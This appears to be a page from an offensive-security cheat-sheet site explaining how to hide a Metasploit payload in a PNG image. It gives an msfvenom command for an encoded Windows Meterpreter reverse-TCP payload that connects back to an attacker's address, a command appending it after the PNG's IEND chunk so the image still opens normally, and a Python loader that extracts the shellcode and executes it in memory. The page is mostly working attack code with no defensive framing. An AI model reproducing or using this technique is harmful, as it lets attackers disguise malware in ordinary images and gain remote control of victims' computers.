🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / PNG Steganography

PNG Steganography

Embed a msfvenom payload inside a legitimate PNG file. The image opens normally but contains a hidden payload appended past the PNG IEND chunk.

Generate and embed

# 1. Generate encoded raw payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/shikata_ga_nai -i 3 -f raw > payload.raw

# 2. Append to PNG
cat payload.raw >> image.png

Verify embedding

# PNG IEND chunk is at offset before payload
strings image.png | tail -5
xxd image.png | tail -20

Extraction loader (Python)

PNG_IEND = b'\x00\x00\x00\x00IEND\xaeB`\x82'

with open("image.png", "rb") as f:
    data = f.read()

idx = data.rfind(PNG_IEND)
if idx == -1:
    raise ValueError("No IEND chunk found")

shellcode = data[idx + len(PNG_IEND):]

import ctypes
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ptr, shellcode, len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)